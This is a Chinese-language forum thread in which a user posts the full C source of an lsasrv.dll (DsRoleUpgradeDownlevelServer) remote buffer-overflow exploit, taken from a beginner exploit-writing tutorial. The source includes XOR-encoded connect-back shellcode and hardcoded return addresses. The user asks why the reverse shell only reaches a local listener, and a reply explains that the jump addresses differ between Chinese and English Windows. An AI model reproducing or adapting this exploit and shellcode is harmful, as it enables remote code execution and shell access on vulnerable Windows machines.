|
阅读:3016回复:1
lsasrv.dll远程溢出的问题
http://hi.baidu.com/vipmsn/blog/item/c2a6db1bbc607fd5ac6e7529.html
《菜鸟版exploit编写指南》之二lsasrv.dll远程溢出 我按照作者的讲解,在本机用nc监听,弹回了shell! 我测试在别的机器上监听,却失败了,不知道为什么,求达人帮忙解释一下!谢谢! 环境:windows 2000 sp4 en #include <stdio.h> #include <windows.h> #pragma comment(lib, "netapi32.lib") #pragma comment(lib, "ws2_32.lib") typedef int (_stdcall *DSROLEUPGRADEDOWNLEVELSERVER) (unsigned long, unsigned long, unsigned long, unsigned long, unsigned long, unsigned long, unsigned long, unsigned long, unsigned long, unsigned long, unsigned long, unsigned long); DSROLEUPGRADEDOWNLEVELSERVER DsRoleUpgradeDownlevelServer; #define MAXLEN 5000 char buf[2*MAXLEN]; char buf2[2000]; #define PORT_OFFSET 118 #define IP_OFFSET 111 char Shellcode[] = "\xEB\x10\x5B\x4B\x33\xC9\x66\xB9\x25\x01\x80\x34\x0B\x99\xE2\xFA" "\xEB\x05\xE8\xEB\xFF\xFF\xFF" "\x70\x62\x99\x99\x99\xC6\xFD\x38\xA9\x99\x99\x99\x12\xD9\x95\x12" "\xE9\x85\x34\x12\xF1\x91\x12\x6E\xF3\x9D\xC0\x71\x02\x99\x99\x99" "\x7B\x60\xF1\xAA\xAB\x99\x99\xF1\xEE\xEA\xAB\xC6\xCD\x66\x8F\x12" "\x71\xF3\x9D\xC0\x71\x1B\x99\x99\x99\x7B\x60\x18\x75\x09\x98\x99" "\x99\xCD\xF1\x98\x98\x99\x99\x66\xCF\x89\xC9\xC9\xC9\xC9\xD9\xC9" "\xD9\xC9\x66\xCF\x8D\x12\x41\xF1\xE6\x99\x99\x98\xF1\x9B\x99\x99" "\xAC\x12\x55\xF3\x89\xC8\xCA\x66\xCF\x81\x1C\x59\xEC\xD3\xF1\xFA" "\xF4\xFD\x99\x10\xFF\xA9\x1A\x75\xCD\x14\xA5\xBD\xF3\x8C\xC0\x32" "\x7B\x64\x5F\xDD\xBD\x89\xDD\x67\xDD\xBD\xA4\x10\xC5\xBD\xD1\x10" "\xC5\xBD\xD5\x10\xC5\xBD\xC9\x14\xDD\xBD\x89\xCD\xC9\xC8\xC8\xC8" "\xF3\x98\xC8\xC8\x66\xEF\xA9\xC8\x66\xCF\x9D\x12\x55\xF3\x66\x66" "\xA8\x66\xCF\x91\xCA\x66\xCF\x85\x66\xCF\x95\xC8\xCF\x12\xDC\xA5" "\x12\xCD\xB1\xE1\x9A\x4C\xCB\x12\xEB\xB9\x9A\x6C\xAA\x50\xD0\xD8" "\x34\x9A\x5C\xAA\x42\x96\x27\x89\xA3\x4F\xED\x91\x58\x52\x94\x9A" "\x43\xD9\x72\x68\xA2\x86\xEC\x7E\xC3\x12\xC3\xBD\x9A\x44\xFF\x12" "\x95\xD2\x12\xC3\x85\x9A\x44\x12\x9D\x12\x9A\x5C\x32\xC7\xC0\x5A" "\x71\x99\x66\x66\x66\x17\xD7\x97\x75\xEB\x67\x2A\x8F\x34\x40\x9C" "\x57\xE7\x41\x7B\xEA\x52\x74\x65\xA2\x40\x90\x6C\x34\x75\x60\x33" "\xF9\x7E\xE0\x5F\xE0"; void MShell(char *h, char *p) { unsigned short port; unsigned long ip; port = htons(atoi(p))^(USHORT)0x9999; ip = inet_addr(h)^(ULONG)0x99999999; memcpy(&Shellcode[PORT_OFFSET], &port, 2); memcpy(&Shellcode[IP_OFFSET], &ip, 4); } void main(int argc, char**argv) { int i; HMODULE hNetapi = LoadLibrary("Netapi32.dll"); if ( !hNetapi ) { printf("Can't load Netapi32.dll...\n"); return; } DsRoleUpgradeDownlevelServer = (DSROLEUPGRADEDOWNLEVELSERVER)GetProcAddress(hNetapi, "DsRoleUpgradeDownlevelServer"); if ( !DsRoleUpgradeDownlevelServer ) { printf("Can't get function DsRoleUpgradeDownlevelServer...\n"); return; } //Unicode (xx 00 xx 00 xx 00) memset(buf, 0, MAXLEN*2); for(i=0; i<MAXLEN-1; i++) buf[2*i] = 0x90; //i = 2844 ~ 2847, values 0x7FFA1571 7c536dbe buf[2*2844] = 0xbe; buf[2*2845] = 0x6d; buf[2*2846] = 0x53; buf[2*2847] = 0x7c; //i = 2840 ~ 2843, nop/nop/jmp 4, values 90 90 EB 04 buf[2*2840] = 0x90; buf[2*2841] = 0x90; buf[2*2842] = 0xEB; buf[2*2843] = 0x04; MShell("127.0.0.1", "1111"); //shellcode connect back to port 1111 //这个地方为127.0.0.1时,在本机监听,可以成功!但是换成别的机器,比如 //192.168.135.153,然后在192.168.135.153上监听,却失败了,这是为什么呢? for(i=0;i < sizeof(Shellcode);i++) buf[2*(i+2848)] = Shellcode; DsRoleUpgradeDownlevelServer( (unsigned long)&buf[0], (unsigned long)&buf2[0], (unsigned long)&buf2[0], (unsigned long)&buf2[0], (unsigned long)&buf2[0], (unsigned long)&buf2[0], (unsigned long)&buf2[0], (unsigned long)&buf2[0], (unsigned long)&buf2[0], (unsigned long)&buf2[0], (unsigned long)&buf2[0], (unsigned long)&buf2[0]); return; } |
|
|
沙发#
发布于:2007-08-24 17:16
是因为一些中文系统下的跳转地址比如0x7ffa1571,在英文版的操作系统上是不存在的。
|
|
|
